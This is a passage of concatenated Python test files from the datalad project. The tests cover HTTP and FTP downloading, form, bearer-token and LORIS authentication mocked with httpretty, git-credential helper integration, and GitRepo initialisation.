run_noauth)\n\n # Complete setup for a new provider.\n\n @with_testsui(responses=[\n \"yes\", # Set up provider?\n # Enter provider details, but then don't save ...\n \"newprovider\", re.escape(furl), \"http_auth\", \"user_password\", \"no\",\n # No provider, try again?\n \"yes\",\n # Enter same provider detains but save this time.\n \"newprovider\", re.escape(furl), \"http_auth\", \"user_password\", \"yes\",\n # Enter credentials.\n \"me\", \"mypass\"\n ])\n def run_set_up_provider():\n with patch.object(downloader, '_download', deny_access):\n downloader.download(furl)\n\n # We've forced an AccessDenied error and then set up bogus credentials,\n # leading to a 501 (not implemented) error.\n assert_raises(AccessFailedError, run_set_up_provider)\n\n\n@with_tempfile(mkdir=True)\ndef check_download_external_url(url, failed_str, success_str, d, url_final=None, check_mtime=True):\n fpath = opj(d, get_url_straight_filename(url))\n providers = get_test_providers(url) # url for check of credentials\n provider = providers.get_provider(url)\n downloader = provider.get_downloader(url)\n\n # we will load/fetch binary blobs\n success_bytes, failed_bytes = None, None\n if success_str is not None:\n success_bytes = success_str.encode()\n if failed_str is not None:\n failed_bytes = failed_str.encode()\n\n # Download way\n with swallow_outputs() as cmo:\n downloaded_path = downloader.download(url, path=d)\n assert_equal(fpath, downloaded_path)\n content = read_file(fpath, decode=False)\n if success_bytes is not None:\n assert_in(success_bytes, content)\n if failed_str is not None:\n assert_false(failed_bytes in content)\n\n # And if we specify size\n for s in [1, 2]:\n with swallow_outputs() as cmo:\n downloaded_path_ = downloader.download(url, path=d, size=s, overwrite=True)\n # should not be affected\n assert_equal(downloaded_path, downloaded_path_)\n content_ = read_file(fpath, decode=False)\n assert_equal(len(content_), s)\n assert_equal(content_, content[:s])\n\n # Fetch way\n content = downloader.fetch(url, decode=False)\n if success_bytes is not None:\n assert_in(success_bytes, content)\n if failed_bytes is not None:\n assert_false(failed_bytes in content)\n\n # And if we specify size\n for s in [1, 2]:\n with swallow_outputs() as cmo:\n content_ = downloader.fetch(url, size=s, decode=False)\n assert_equal(len(content_), s)\n assert_equal(content_, content[:s])\n\n # Verify status\n status = downloader.get_status(url)\n assert(isinstance(status, FileStatus))\n if not url.startswith('ftp://') and check_mtime:\n # TODO introduce support for mtime into requests_ftp?\n assert(status.mtime)\n assert(status.size)\n\n # Verify possible redirections\n if url_final is None:\n url_final = url\n assert_equal(downloader.get_target_url(url), url_final)\n\n # TODO -- more and more specific\n\n\ndef check_download_external_url_no_mtime(*args, **kwargs):\n \"\"\"A helper to be used in generator tests\n\n since Yarik doesn't know if it is possible to pass optional args,\n and @with_tempfile sticks itself at the end of *args\n \"\"\"\n kwargs['check_mtime'] = False\n return check_download_external_url(*args, **kwargs)\n\n\n# TODO: @use_cassette is not playing nice with generators, causing\n# troubles when trying to cause test skip if no network. So disabling for now\n# https://github.com/datalad/datalad/issues/3158\n# @use_cassette('test_authenticate_external_portals', record_mode='once')\ndef test_authenticate_external_portals():\n skip_if_no_network()\n check_download_external_url(\n \"https://portal.nersc.gov/project/crcns/download/alm-1/checksums.md5\",\n \"<form action=\",\n \"datafiles/meta_data_files.tar.gz\",\n )\n # seems to be gone\n # check_download_external_url(\n # 'https://db.humanconnectome.org/data/archive/projects/HCP_500/subjects/100307/experiments/100307_CREST/resources/100307_CREST/files/unprocessed/3T/Diffusion/100307_3T_DWI_dir97_LR.bval',\n # \"failed\",\n # \"2000 1005 2000 3000\",\n # )\n check_download_external_url(\n 'https://db.humanconnectome.org/data/experiments/ConnectomeDB_E09797/resources/166768/files/filescans.csv',\n \"failed\",\n \"'Scan','FilePath'\",\n )\n\n check_download_external_url_no_mtime(\n \"https://n5eil01u.ecs.nsidc.org/ICEBRIDGE/IDBMG4.004/1993.01.01/BedMachineGreenland-2021-04-20.nc.xml\",\n 'input type=\"password\"',\n 'DOCTYPE GranuleMetaDataFile',\n )\n\ntest_authenticate_external_portals.tags = ['external-portal', 'network']\n\n\n@skip_if_no_network\n@use_cassette('test_detect_login_error1')\ndef test_detect_login_error1():\n # we had unicode decode issue: https://github.com/datalad/datalad/issues/4951\n check_download_external_url(\n \"https://portal.nersc.gov/project/crcns/download/ac-5/docs/data_analysis_instructions.txt\",\n \"<form action=\",\n \"DMR stimulus\")\ntest_detect_login_error1.tags = ['external-portal', 'network']\n\n\n@skip_if_no_network\n@use_cassette('test_detect_login_error2')\ndef test_detect_login_error2():\n # a tiny binary file so we do fetch it but it cannot be decoded, we must not fail\n check_download_external_url(\n \"https://portal.nersc.gov/project/crcns/download/mt-3/example_scripts.zip\",\n \"<form action=\",\n None)\ntest_detect_login_error2.tags = ['external-portal', 'network']\n\n\n@known_failure_githubci_win\n@skip_if_no_network\ndef test_download_ftp():\n try:\n import requests_ftp\n except ImportError:\n raise SkipTest(\"need requests_ftp\") # TODO - make it not ad-hoc\n try:\n check_download_external_url(\n \"ftp://ftp.gnu.org/README\",\n None,\n \"This is ftp.gnu.org\"\n )\n except AccessFailedError as exc: # pragma: no cover\n if 'status code 503' in str(exc):\n raise SkipTest(\"ftp.gnu.org throws 503 when on travis (only?)\")\n raise\n\n\n# TODO: redo smart way with mocking, to avoid unnecessary CPU waste\n@with_tree(tree={'file.dat': '1'})\n@serve_path_via_http\n@with_tempfile\ndef test_mtime(path=None, url=None, tempfile=None):\n # let's set custom mtime\n file_to_download = opj(path, 'file.dat')\n os.utime(file_to_download, (time.time(), 1000))\n assert_equal(os.stat(file_to_download).st_mtime, 1000)\n\n file_url = \"%s/%s\" % (url, 'file.dat')\n with swallow_outputs():\n get_test_providers().download(file_url, path=tempfile)\n assert_equal(os.stat(tempfile).st_mtime, 1000)\n\n\ndef test_get_status_from_headers():\n # function doesn't do any value transformation ATM\n headers = {\n 'Content-Length': '123',\n # some other file record - we don't test content here yet\n 'Content-Disposition': 'attachment; filename=\"bogus.txt\"',\n 'Last-Modified': 'Sat, 07 Nov 2015 05:23:36 GMT'\n }\n headers['bogus1'] = '123'\n\n assert_equal(\n HTTPDownloader.get_status_from_headers(headers),\n FileStatus(size=123, filename='bogus.txt', mtime=1446873816))\n\n assert_equal(HTTPDownloader.get_status_from_headers({'content-lengtH': '123'}),\n FileStatus(size=123))\n\n filename = 'Glasser_et_al_2016_HCP_MMP1.0_RVVG.zip'\n headers_content_disposition = {\n 'Content-Disposition':\n 'Attachment;Filename=\"%s\"' % filename, }\n assert_equal(\n HTTPDownloader.get_status_from_headers(headers_content_disposition).filename,\n filename)\n\n # since we are providing full headers -- irrelevant\n assert_equal(get_url_disposition_filename(\"http://irrelevant\", headers_content_disposition),\n filename)\n\n\n\n# TODO: test that download fails (even if authentication credentials are right) if form_url\n# is wrong!\n\n\nclass FakeCredential1(UserPassword):\n \"\"\"Credential to test scenarios.\"\"\"\n # to be reusable, and not leak across tests,\n # we should get _fixed_credentials per instance\n def __init__(self, *args, **kwargs):\n super(FakeCredential1, self).__init__(*args, **kwargs)\n self._fixed_credentials = [\n {'user': 'testlogin', 'password': 'testpassword'},\n {'user': 'testlogin2', 'password': 'testpassword2'},\n {'user': 'testlogin2', 'password': 'testpassword3'}\n ]\n def is_known(self):\n return True\n def __call__(self):\n return self._fixed_credentials[0]\n def enter_new(self):\n # pop last used credential, so we would use \"new\" ones\n del self._fixed_credentials[0]\n\n\nurl = \"http://example.com/crap.txt\"\ntest_cookie = 'somewebsite=testcookie'\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\[email protected]\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\ndef test_HTMLFormAuthenticator_httpretty(d=None):\n fpath = opj(d, 'crap.txt')\n\n credential = FakeCredential1(name='test', url=None)\n credentials = credential()\n\n def request_post_callback(request, uri, headers):\n post_params = request.parsed_body\n assert_equal(credentials['password'], post_params['password'][0])\n assert_equal(credentials['user'], post_params['username'][0])\n assert_not_in('Cookie', request.headers)\n return (200, headers, \"Got {} response from {}\".format(request.method, uri))\n\n def request_get_callback(request, uri, headers):\n assert_equal(request.body, b'')\n assert_in('Cookie', request.headers)\n assert_equal(request.headers['Cookie'], test_cookie)\n return (200, headers, \"correct body\")\n\n # SCENARIO 1\n # callback to verify that correct credentials are provided\n # and then returns the cookie to test again for 'GET'ing\n httpretty.register_uri(httpretty.POST, url,\n body=request_post_callback,\n set_cookie=test_cookie)\n # then in GET verify that correct cookie was provided and\n # that no credentials are there\n httpretty.register_uri(httpretty.GET, url,\n body=request_get_callback)\n\n # SCENARIO 2\n # outdated cookie provided to GET -- must return 403 (access denied)\n # then our code should POST credentials again and get a new cookies\n # which is then provided to GET\n\n # SCENARIO 3\n # outdated cookie\n # outdated credentials\n # it should ask for new credentials (FakeCredential1 already mocks for that)\n # and then SCENARIO1 must work again\n\n # SCENARIO 4\n # cookie and credentials expired, user provided new bad credential\n\n # Also we want to test how would it work if cookie is available (may be)\n # TODO: check with correct and incorrect credential\n authenticator = HTMLFormAuthenticator(dict(username=\"{user}\",\n password=\"{password}\",\n submit=\"CustomLogin\"))\n # TODO: with success_re etc\n # This is a \"success test\" which should be tested in various above scenarios\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n downloader.download(url, path=d)\n\n content = read_file(fpath)\n assert_equal(content, \"correct body\")\n\n # Unsuccessful scenarios to test:\n # the provided URL at the end 404s, or another failure (e.g. interrupted download)\n\n\n@with_memory_keyring\n@with_testsui(responses=['no', 'yes', 'testlogin', 'testpassword'])\ndef test_auth_but_no_cred(keyring=None):\n authenticator = HTMLFormAuthenticator(\"\")\n # Replying 'no' to the set credentials prompt should raise ValueError\n assert_raises(ValueError, HTTPDownloader, credential=None, authenticator=authenticator)\n # Reply 'yes' and set test user:pass at the next set credentials prompt\n downloader = HTTPDownloader(credential=None, authenticator=authenticator)\n # Verify credentials correctly set to test user:pass\n assert_equal(downloader.credential.get('user'), 'testlogin')\n assert_equal(downloader.credential.get('password'), 'testpassword')\n\n\n@with_testsui(responses=['yes']) # will request to reentry it\ndef test_authfail404_interactive():\n # we will firsts get 'failed' but then real 404 when trying new password\n check_httpretty_authfail404(['failed', '404'])\n\n\n@with_testsui(interactive=False) # no interactions -- blow!\ndef test_authfail404_noninteractive():\n # we do not get to the 2nd attempt so just get 'failed'\n # and exception thrown inside is not emerging all the way here but\n # caught in the check_\n check_httpretty_authfail404(['failed'])\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\[email protected]\n@with_fake_cookies_db\n@with_tempfile(mkdir=True)\ndef check_httpretty_authfail404(exp_called, d):\n # mimic behavior of nersc which 404s but provides feedback whenever\n # credentials are incorrect. In our case we should fail properly\n credential = FakeCredential1(name='test', url=None)\n\n was_called = []\n\n def request_post_callback(request, uri, headers):\n post_params = request.parsed_body\n if post_params['password'][0] == 'testpassword2':\n was_called.append('404')\n return 404, headers, \"Really 404\"\n else:\n was_called.append('failed')\n return 404, headers, \"Failed\"\n\n httpretty.register_uri(httpretty.POST, url, body=request_post_callback)\n\n # Also we want to test how would it work if cookie is available (may be)\n authenticator = HTMLFormAuthenticator(dict(username=\"{user}\",\n password=\"{password}\",\n submit=\"CustomLogin\"),\n failure_re=\"Failed\")\n\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n # first one goes with regular DownloadError -- was 404 with not matching content\n assert_raises(DownloadError, downloader.download, url, path=d)\n assert_equal(was_called, exp_called)\n\n\ndef test_auth_bytes_content():\n # Our regexes are strings, but we can get content in bytes:\n # I am not sure yet either we shouldn't just skip then testing for regex,\n # but we definitely should not crash.\n authenticator = HTTPBaseAuthenticator(failure_re=\"Failed\")\n authenticator.check_for_auth_failure(b\"bytes\")\n # but ATM we do test bytes content, let's ENSURE that!\n with assert_raises(AccessDeniedError):\n authenticator.check_for_auth_failure(b\"Failed\")\n\n\nclass FakeCredential2(UserPassword):\n \"\"\"Credential to test scenarios.\"\"\"\n _fixed_credentials = {'user': 'testlogin', 'password': 'testpassword'}\n def is_known(self):\n return True\n def __call__(self):\n return self._fixed_credentials\n def enter_new(self):\n return self._fixed_credentials\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\[email protected]\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db(cookies={'example.com': dict(some_site_id='idsomething', expires='Tue, 15 Jan 2013 21:47:38 GMT')})\ndef test_scenario_2(d=None):\n fpath = opj(d, 'crap.txt')\n\n credential = FakeCredential2(name='test', url=None)\n credentials = credential()\n authenticator = HTMLFormAuthenticator(dict(username=\"{user}\",\n password=\"{password}\",\n submit=\"CustomLogin\"))\n\n def request_get_with_expired_cookie_callback(request, uri, headers):\n assert_in('Cookie', request.headers)\n cookie_vals = request.headers['Cookie'].split('; ')\n for v in cookie_vals:\n if v.startswith('expires'):\n expiration_date = v.split('=')[1]\n expiration_epoch_time = timegm(time.strptime(expiration_date, \"%a, %d %b %Y %H:%M:%S GMT\"))\n assert_greater(time.time(), expiration_epoch_time)\n return (403, headers, \"cookie was expired\")\n\n def request_post_callback(request, uri, headers):\n post_params = request.parsed_body\n assert_equal(credentials['password'], post_params['password'][0])\n assert_equal(credentials['user'], post_params['username'][0])\n assert_not_in('Cookie', request.headers)\n return (200, headers, \"Got {} response from {}\".format(request.method, uri))\n\n def request_get_callback(request, uri, headers):\n assert_equal(request.body, b'')\n assert_in('Cookie', request.headers)\n assert_equal(request.headers['Cookie'], test_cookie)\n return (200, headers, \"correct body\")\n\n # SCENARIO 2\n # outdated cookie provided to GET, return 403 (access denied)\n # then like SCENARIO 1 again:\n # POST credentials and get a new cookie\n # which is then provided to a GET request\n httpretty.register_uri(httpretty.GET, url,\n responses=[httpretty.Response(body=request_get_with_expired_cookie_callback),\n httpretty.Response(body=request_get_callback),\n ])\n\n # callback to verify that correct credentials are provided\n # and then returns the cookie to test again for 'GET'ing\n httpretty.register_uri(httpretty.POST, url,\n body=request_post_callback,\n set_cookie=test_cookie)\n # then in another GET is performed to verify that correct cookie was provided and\n # that no credentials are there\n\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n downloader.download(url, path=d)\n\n content = read_file(fpath)\n assert_equal(content, \"correct body\")\n\n\nclass FakeCredential3(Token):\n \"\"\"Credential to test scenarios.\"\"\"\n _fixed_credentials = {'token' : 'testtoken' }\n def is_known(self):\n return True\n def __call__(self):\n return self._fixed_credentials\n def enter_new(self):\n return self._fixed_credentials\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\[email protected]\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\ndef test_HTTPBearerTokenAuthenticator(d=None):\n fpath = opj(d, 'crap.txt')\n\n def request_get_callback(request, uri, headers):\n # We can't assert inside the callback, or running the\n # test give \"Connection aborted\" errors instead of telling\n # us that the assertion failed. So instead, we make\n # the request object available outside of the callback\n # and do the assertions in the main test, not the callback\n request_get_callback.req = request\n return (200, headers, \"correct body\")\n\n httpretty.register_uri(httpretty.GET, url,\n body=request_get_callback)\n\n\n\n credential = FakeCredential3(name='test', url=None)\n authenticator = HTTPBearerTokenAuthenticator()\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n downloader.download(url, path=d)\n\n # Perform assertions. See note above.\n r = request_get_callback.req\n assert_equal(r.body, b'')\n assert_in('Authorization', r.headers)\n assert_equal(r.headers['Authorization'], \"Bearer testtoken\")\n\n content = read_file(fpath)\n assert_equal(content, \"correct body\")\n\n\nclass FakeLorisCredential(Token):\n \"\"\"Credential to test scenarios.\"\"\"\n _fixed_credentials = {'token' : 'testtoken' }\n def is_known(self):\n return False\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\[email protected]\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\ndef test_HTTPLorisTokenAuthenticator(d=None):\n fpath = opj(d, 'crap.txt')\n\n def request_get_callback(request, uri, headers):\n # We can't assert inside the callback, or running the\n # test give \"Connection aborted\" errors instead of telling\n # us that the assertion failed. So instead, we make\n # the request object available outside of the callback\n # and do the assertions in the main test, not the callback\n request_get_callback.req = request\n return (200, headers, \"correct body\")\n\n httpretty.register_uri(httpretty.GET, url,\n body=request_get_callback)\n\n\n\n credential = FakeCredential3(name='test', url=None)\n authenticator = HTTPBearerTokenAuthenticator()\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n downloader.download(url, path=d)\n\n # Perform assertions. See note above.\n r = request_get_callback.req\n assert_equal(r.body, b'')\n assert_in('Authorization', r.headers)\n assert_equal(r.headers['Authorization'], \"Bearer testtoken\")\n\n content = read_file(fpath)\n assert_equal(content, \"correct body\")\n\n\n@skip_if(not httpretty, \"no httpretty\")\n@without_http_proxy\[email protected]\n@with_tempfile(mkdir=True)\n@with_fake_cookies_db\n@with_memory_keyring\n@with_testsui(responses=['yes', 'user'])\ndef test_lorisadapter(d=None, keyring=None):\n fpath = opj(d, 'crap.txt')\n loginurl = \"http://www.example.com/api/v0.0.2/login\"\n\n def request_get_callback(request, uri, headers):\n # We can't assert inside the callback, or running the\n # test give \"Connection aborted\" errors instead of telling\n # us that the assertion failed. So instead, we make\n # the request object available outside of the callback\n # and do the assertions in the main test, not the callback\n request_get_callback.req = request\n return (200, headers, \"correct body\")\n def request_post_callback(request, uri, headers):\n return (200, headers, '{ \"token\": \"testtoken33\" }')\n\n httpretty.register_uri(httpretty.GET, url,\n body=request_get_callback)\n httpretty.register_uri(httpretty.POST, loginurl,\n body=request_post_callback)\n\n\n\n credential = LORIS_Token(name='test', url=loginurl, keyring=None)\n authenticator = HTTPBearerTokenAuthenticator()\n downloader = HTTPDownloader(credential=credential, authenticator=authenticator)\n downloader.download(url, path=d)\n\n r = request_get_callback.req\n assert_equal(r.body, b'')\n assert_in('Authorization', r.headers)\n assert_equal(r.headers['Authorization'], \"Bearer testtoken33\")\n # Verify credentials correctly set to test user:pass\n\n content = read_file(fpath)\n assert_equal(content, \"correct body\")\n\n\n@with_tree(tree=[('file.dat', 'abc')])\n@serve_path_via_http\ndef test_download_url(toppath=None, topurl=None):\n furl = \"%sfile.dat\" % topurl\n # fails if URL is dysfunctional\n assert_raises(DownloadError, download_url, furl + 'magic', toppath)\n\n # working download\n tfpath = opj(toppath, \"file-downloaded.dat\")\n download_url(furl, tfpath)\n ok_file_has_content(tfpath, 'abc')\n\n # fails if destfile exists\n assert_raises(DownloadError, download_url, furl, tfpath)\n # works when forced\n download_url(furl, tfpath, overwrite=True)\n" }, { "alpha_fraction": 0.636814534664154, "alphanum_fraction": 0.6397079229354858, "avg_line_length": 36.60621643066406, "blob_id": "d1954638fae0aca89380d3f9fbfdf1264a18a280", "content_id": "74f798d8c9e515d2aef864875d0e8505c07aa749", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7258, "license_type": "permissive", "max_line_length": 80, "num_lines": 193, "path": "/datalad/local/tests/test_gitcredential.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test git-credential wrapper and helper\"\"\"\n\nfrom datalad.api import Dataset\nfrom datalad.downloaders.credentials import UserPassword\nfrom datalad.local.gitcredential import GitCredentialInterface\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_is_instance,\n assert_not_in,\n assert_true,\n eq_,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n)\n\n\n@with_tempfile\ndef test_gitcredential_interface(path=None):\n # use a dataset as a local configuration vehicle\n ds = Dataset(path).create()\n\n # preserve credentials between git processes for a brief time\n # credential-cache is not supported on windows (needs UNIX sockets)\n # ds.config.set('credential.helper', 'cache', scope='local')\n # However, first set an empty helper in order to disable already set helpers\n ds.config.set('credential.helper', '', scope='local')\n ds.config.set('credential.helper', 'store', scope='local')\n\n # git manages credentials by target URL\n credurl = 'https://example.datalad.org/somepath'\n credurl_justhost = 'https://example.datalad.org'\n # define a credential\n cred = GitCredentialInterface(url=credurl, username='mike',\n password='s3cr3t', repo=ds)\n # put it in the manager (a cache in this case, but could invoke any number\n # of helpers\n cred.approve()\n # new instance, no knowledge of login\n cred = GitCredentialInterface(url=credurl, repo=ds)\n assert_not_in('username', cred)\n # query store\n cred.fill()\n eq_(cred['username'], 'mike')\n eq_(cred['password'], 's3cr3t')\n # git does host-only identification by default (see credential.useHttpPath)\n cred = GitCredentialInterface(url=credurl_justhost, repo=ds)\n cred.fill()\n eq_(cred['username'], 'mike')\n eq_(cred['password'], 's3cr3t')\n\n # the URL is enough to remove (\"reject\") a credential\n GitCredentialInterface(url=credurl, repo=ds).reject()\n\n cred = GitCredentialInterface(url=credurl, repo=ds)\n # this will yield empty passwords, not the most precise test\n # whether it actually removed the credentials, but some test\n # at least\n cred.fill()\n assert_false(cred['username'])\n assert_false(cred['password'])\n\n\n@with_tempfile\ndef test_datalad_credential_helper(path=None):\n\n ds = Dataset(path).create()\n\n # tell git to use git-credential-datalad\n ds.config.add('credential.helper', 'datalad', scope='local')\n ds.config.add('datalad.credentials.githelper.noninteractive', 'true',\n scope='global')\n\n from datalad.downloaders.providers import Providers\n\n url1 = \"https://datalad-test.org/some\"\n url2 = \"https://datalad-test.org/other\"\n provider_name = \"datalad-test.org\"\n\n # `Providers` code is old and only considers a dataset root based on PWD\n # for config lookup. contextmanager below can be removed once the\n # provider/credential system is redesigned.\n with chpwd(ds.path):\n\n gitcred = GitCredentialInterface(url=url1, repo=ds)\n\n # There's nothing set up yet, helper should return empty\n gitcred.fill()\n eq_(gitcred['username'], '')\n eq_(gitcred['password'], '')\n\n # store new credentials\n # Note, that `Providers.enter_new()` currently uses user-level config\n # files for storage only. TODO: make that an option!\n # To not mess with existing ones, fail if it already exists:\n\n cfg_file = Path(Providers._get_providers_dirs()['user']) \\\n / f\"{provider_name}.cfg\"\n assert_false(cfg_file.exists())\n\n # Make sure we clean up\n from datalad.tests import _TEMP_PATHS_GENERATED\n _TEMP_PATHS_GENERATED.append(str(cfg_file))\n\n # Give credentials to git and ask it to store them:\n gitcred = GitCredentialInterface(url=url1, username=\"dl-user\",\n password=\"dl-pwd\", repo=ds)\n gitcred.approve()\n\n assert_true(cfg_file.exists())\n providers = Providers.from_config_files()\n p1 = providers.get_provider(url=url1, only_nondefault=True)\n assert_is_instance(p1.credential, UserPassword)\n eq_(p1.credential.get('user'), 'dl-user')\n eq_(p1.credential.get('password'), 'dl-pwd')\n\n # default regex should be host only, so matching url2, too\n p2 = providers.get_provider(url=url2, only_nondefault=True)\n assert_is_instance(p1.credential, UserPassword)\n eq_(p1.credential.get('user'), 'dl-user')\n eq_(p1.credential.get('password'), 'dl-pwd')\n\n # git, too, should now find it for both URLs\n gitcred = GitCredentialInterface(url=url1, repo=ds)\n gitcred.fill()\n eq_(gitcred['username'], 'dl-user')\n eq_(gitcred['password'], 'dl-pwd')\n\n gitcred = GitCredentialInterface(url=url2, repo=ds)\n gitcred.fill()\n eq_(gitcred['username'], 'dl-user')\n eq_(gitcred['password'], 'dl-pwd')\n\n # Rejection must not currently lead to deleting anything, since we would\n # delete too broadly.\n gitcred.reject()\n assert_true(cfg_file.exists())\n gitcred = GitCredentialInterface(url=url1, repo=ds)\n gitcred.fill()\n eq_(gitcred['username'], 'dl-user')\n eq_(gitcred['password'], 'dl-pwd')\n dlcred = UserPassword(name=provider_name)\n eq_(dlcred.get('user'), 'dl-user')\n eq_(dlcred.get('password'), 'dl-pwd')\n\n\n@with_tempfile\ndef test_credential_cycle(path=None):\n\n # Test that we break a possible cycle when DataLad is configured to query\n # git-credential and Git is configured to query DataLad.\n # This may happen in a not-so-obvious fashion, if git-credential-datalad\n # was configured generally rather than for a specific URL, while there's a\n # datalad provider config pointing to Git for a particular URL.\n\n ds = Dataset(path).create()\n\n # tell git to use git-credential-datalad\n ds.config.add('credential.helper', 'datalad', scope='local')\n ds.config.add('datalad.credentials.githelper.noninteractive', 'true',\n scope='global')\n\n provider_dir = ds.pathobj / '.datalad' / 'providers'\n provider_dir.mkdir(parents=True, exist_ok=True)\n provider_cfg = provider_dir / 'test_cycle.cfg'\n provider_cfg.write_text(r\"\"\"\n[provider:test_cycle]\n url_re = http.*://.*data\\.example\\.com\n authentication_type = http_basic_auth\n credential = test_cycle_cred\n[credential:test_cycle_cred]\n type = git\n\"\"\")\n ds.save(message=\"Add provider config\")\n\n gitcred = GitCredentialInterface(url=\"https://some.data.exampe.com\",\n repo=ds)\n\n # There's nothing set up yet, helper should return empty.\n # Importantly, it shouldn't end up in an endless recursion, but just\n # return w/o something filled in.\n gitcred.fill()\n eq_(gitcred['username'], '')\n eq_(gitcred['password'], '')\n" }, { "alpha_fraction": 0.6081070303916931, "alphanum_fraction": 0.6176494359970093, "avg_line_length": 31.436508178710938, "blob_id": "149144c9531e2d21cf89fac665255008932a7eab", "content_id": "18f4257d30366dc7173fb6d4cd6d2617232d18ae", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12261, "license_type": "permissive", "max_line_length": 87, "num_lines": 378, "path": "/datalad/dataset/tests/test_gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test implementation of class GitRepo\n\n\"\"\"\n\nimport logging\nimport os\nimport os.path as op\nimport sys\n\nfrom datalad.dataset.gitrepo import (\n GitRepo,\n _get_dot_git,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n PathKnownToRepositoryError,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_in,\n assert_is_instance,\n assert_not_in,\n assert_raises,\n eq_,\n neq_,\n ok_,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_invalid_path(path=None):\n with chpwd(path):\n assert_raises(ValueError, GitRepo, path=\"git://some/url\")\n ok_(not op.exists(op.join(path, \"git:\")))\n assert_raises(ValueError, GitRepo, path=\"file://some/relative/path\")\n ok_(not op.exists(op.join(path, \"file:\")))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_GitRepo_instance_from_existing(path=None):\n GitRepo(path).init()\n\n gr = GitRepo(path)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_instance_from_not_existing(path=None, path2=None):\n # 1. create=False and path doesn't exist:\n repo = GitRepo(path)\n assert_false(op.exists(path))\n\n # 2. create=False, path exists, but no git repo:\n os.mkdir(path)\n ok_(op.exists(path))\n repo = GitRepo(path)\n assert_false(op.exists(op.join(path, '.git')))\n\n # 3. create=True, path doesn't exist:\n gr = GitRepo(path2).init()\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path2, '.git')))\n # re-enable from core GitRepo has a status() method\n #assert_repo_status(path2, annex=False)\n\n # 4. create=True, path exists, but no git repo:\n gr = GitRepo(path).init()\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n # re-enable from core GitRepo has a status() method\n #assert_repo_status(path, annex=False)\n\n\n@with_tempfile\ndef test_GitRepo_init_options(path=None):\n # passing an option, not explicitly defined in GitRepo class:\n gr = GitRepo(path).init(init_options=['--bare'])\n ok_(gr.cfg.getbool(section=\"core\", option=\"bare\"))\n\n\n@with_tree(\n tree={\n 'subds': {\n 'file_name': ''\n }\n }\n)\ndef test_init_fail_under_known_subdir(path=None):\n repo = GitRepo(path).init()\n repo.call_git(['add', op.join('subds', 'file_name')])\n # Should fail even if we do not commit but only add to index:\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds')).init()\n assert_in(\"file_name\", str(cme.value)) # we provide a list of offenders\n # and after we commit - the same story\n repo.call_git(['commit', '-m', \"added file\"])\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds')).init()\n\n # But it would succeed if we disable the checks\n GitRepo(op.join(path, 'subds')).init(sanity_checks=False)\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_equals(path1=None, path2=None):\n\n repo1 = GitRepo(path1)\n repo2 = GitRepo(path1)\n ok_(repo1 == repo2)\n eq_(repo1, repo2)\n repo2 = GitRepo(path2)\n neq_(repo1, repo2)\n ok_(repo1 != repo2)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_GitRepo_flyweight(path1=None, path2=None):\n\n import gc\n\n repo1 = GitRepo(path1).init()\n assert_is_instance(repo1, GitRepo)\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # As long as we don't reintroduce any circular references or produce\n # garbage during instantiation that isn't picked up immediately, `repo1`\n # should be the only counted reference to this instance.\n # Note, that sys.getrefcount reports its own argument and therefore one\n # reference too much.\n assert_equal(1, 